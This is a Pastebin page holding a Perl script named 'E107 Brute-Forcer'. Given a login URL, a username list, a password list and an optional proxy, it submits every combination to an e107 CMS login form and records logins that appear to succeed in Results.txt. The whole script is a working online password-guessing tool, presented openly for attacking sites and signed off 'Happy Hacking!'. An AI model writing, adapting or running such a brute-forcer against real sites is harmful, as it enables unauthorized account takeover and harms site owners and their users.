Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #Thanks also to IBM for helping to create this - Bret Swedeen especially
- #NBTDOTM
- use HTML::Parser;
- use WWW::Mechanize;
- use HTTP::Cookies;
- use Test::More no_plan;
- my $NumArgs = $#ARGV + 1;#Determine the number of arguments the user has given us
- if ($NumArgs <= 2) {
- #Our user has only entered some information. Display help screen.
- header();
- exit();}
- if (($NumArgs == 3) or ($NumArgs == 4)){
- my $url = $ARGV[0]; #Host is the first argument supplied
- my $userloc = $ARGV[1]; #Username is the 2nd argument supplied
- my $passloc = $ARGV[2]; #Passlist location is 3rd argument
- my $proxyloc = $ARGV[3]; #Location of the proxy
- #Display header
- print qq{
- ----------------------------------------------------------------------
- E107 Brute-Forcer
- Custom Built by Juno
- NBTDOTM
- ----------------------------------------------------------------------
- };
- print "\nYour host is: $url";
- print "\nYour userlist is: $userloc";
- print "\nYour password list is: $passloc";
- goto NoProxy if $proxyloc eq '';
- print "\nYour proxy is: http://$proxyloc";
- NoProxy: print "\n\nThe program will now try bruteforcing the host you selected.";
- print "\nPress ENTER to begin, or Control-C to quit.";
- my $useless = <STDIN>; #Last chance for user to abort attack
- print "\nNBTDOTM\n-------------------------\n";
- print "\nCreating temp directory to store results in... ";
- mkdir('temp', 0777) || print $!;
- print "Done.";
- #Use userlist
- open USERLIST, $userloc or die$!;
- my @users = USERLIST;
- while (my $user = <USERLIST>) {
- chomp($user);
- print "\nCreating new directory for new user $user... ";
- mkdir('temp' . '\\' . $user, 0777) || print $!;
- print "Done.";
- #Use passlist
- open PASSLIST, $passloc or die $!;
- my @lines = PASSLIST;
- while (my $password = <PASSLIST>) {
- chomp($password);
- print "\nTrying USER $user PASSWORD $password... ";
- my $outfile = 'temp' . '\\' . $user . '\\' . $password . ".htm";
- my $mech = WWW::Mechanize->new(autocheck => 1);
- $mech->stack_depth($max_depth => 0); #Set maxd to 0 if running out of memory;
- $mech->timeout(60);
- $mech->cookie_jar(HTTP::Cookies->new());
- #Set proxy if specified
- goto GETPAGE if $proxyloc eq '';
- $mech->proxy(['http'], 'http://' . $proxyloc);
- GETPAGE: $mech->get('http://' . $url);
- my $test = $mech->success;
- if ($@) {
- goto GETPAGE; #Error trapping
- }
- print "$test";
- $mech->field(username => "$user");
- $mech->field(userpass => "$password");
- $mech->click();
- my $output_page = $mech->content();
- open(OUTFILE, ">$outfile");
- print OUTFILE "$output_page";
- close(OUTFILE);
- my $filesize = -s $outfile;
- #Search file for 'incorrect','invalid', or 'wrong'; if not found, we have success!
- if ($output_page =~ /(incorrect|invalid|wrong)/i) {
- print "Wrong Passsword";
- } else {
- print "SUCCESS";
- my $successloc = 'Results.txt';
- open(SUCCESS, ">>$successloc");
- print SUCCESS "Successful login with USERNAME: $user PASSWORD: $password\n";
- close(SUCCESS);
- }
- #Output current progress to Progress.txt in case of crash
- open(PROGRESS, ">Progress.txt");
- print PROGRESS "E107 Brute force progress\n----------------------\nLast User Tried: $user\nLast Password Tried: $password\n";
- close(PROGRESS);
- #Delete password file after analysis[Comment out if you want to keep]
- my $delfile = 'temp' . '\\' . $user . '\\' . $password . ".htm";
- unlink($delfile);
- print ".";
- }
- #Delete username directory
- rmdir('temp' . '\\' . $user);
- }
- #Delete temp directory
- rmdir('temp');
- }
- print "\n\nAttack complete!\nResults will be located in Results.txt.";
- my $resultsloc = 'Results.txt';
- open(RESULTS, ">>$resultsloc");
- print RESULTS "----------------\nAttack Complete\n----------------\n";
- close(RESULTS);
- exit();
- sub header{
- print qq{
- ----------------------------------------------------------------------
- E107 Brute-Forcer
- Custom Built by Juno
- NBTDOTM
- ----------------------------------------------------------------------
- Usage: E107Brute [target site] [userlist] [passlist] (proxy)
- Example: E107Brute somesite.com/login.php users.txt passwords.txt 192.
- 168.1.1:80
- The program will attempt a bruteforce on the usernames specified using
- the password list that was supplied. No switches(-) are needed for the
- arguments. Remember to specifiy the full URL to the login page. The
- proxy argument is optional; just omit if you don't need it. Results can
- be found in the folder that this tool is run under in 'Results.txt'.
- Happy Hacking!
- };
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement